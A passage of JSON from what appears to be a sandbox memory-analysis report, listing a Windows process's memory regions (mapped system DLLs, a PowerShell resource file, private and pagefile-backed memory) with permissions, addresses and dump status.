"kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:07.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1342", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:07.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1375", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1376", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1377", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1378", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1379", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1380", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001381-addr_0x0000000000170000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_1381", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:07.976", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001382-addr_0x0000000000180000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1382", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:07.976", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001383-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1383", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001384-addr_0x0000000000320000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_1384", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5931007, "entry_point": 0, "filename": null, "id": "region_1385", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7540735, "entry_point": 0, "filename": null, "id": "region_1386", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 28573695, "entry_point": 0, "filename": null, "id": "region_1387", "name": "pagefile_0x0000000000740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7602176, "timestamp": "00:01:07.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1388", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:07.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1389", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:07.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1390", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:07.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_1391", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:07.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791729963008, "type": "region", "version": 1 }, "end_va": 8791730065407, "entry_point": 8791729963008, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1392", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791729963008, "timestamp": "00:01:07.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1393", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:07.993", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1394", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:07.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1395", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:07.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1396", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:07.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1397", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:07.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1398", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:07.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1399", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:07.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1400", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:07.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1401", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:07.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1402", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:07.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1403", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:07.999", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1404", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:08.000", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001448-addr_0x00000000001d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_1448", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001449-addr_0x0000000001b40000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28573696, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 0, "filename": null, "id": "region_1449", "name": "private_0x0000000001b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 28573696, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001450-addr_0x0000000001da0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31588351, "entry_point": 0, "filename": null, "id": "region_1450", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1451", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1452", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:08.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_1457", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:08.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_1458", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:08.186", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001459-addr_0x0000000001cf0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30343168, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_1459", "name": "private_0x0000000001cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30343168, "timestamp": "00:01:08.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31588352, "type": "region", "version": 1 }, "end_va": 32501759, "entry_point": 0, "filename": null, "id": "region_1460", "name": "pagefile_0x0000000001e20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31588352, "timestamp": "00:01:08.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1461", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:08.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1462", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:08.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_1486", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_1487", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_1488", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 35450879, "entry_point": 32505856, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1489", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32505856, "timestamp": "00:01:08.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36896767, "entry_point": 0, "filename": null, "id": "region_1490", "name": "private_0x00000000022b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36372480, "timestamp": "00:01:08.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1491", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:08.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791736057856, "type": "region", "version": 1 }, "end_va": 8791737286655, "entry_point": 8791736095932, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1492", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791736057856, "timestamp": "00:01:08.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1493", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:08.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1494", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:08.264", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001495-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1495", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:01:08.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_1514", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29749247, "entry_point": 29622272, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1515", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 29622272, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 41037823, "entry_point": 0, "filename": null, "id": "region_1516", "name": "pagefile_0x0000000002330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36896768, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41943039, "entry_point": 0, "filename": null, "id": "region_1517", "name": "private_0x0000000002780000", "norm_filename": null, "region_type": "private_memory", "start_va": 41418752, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": 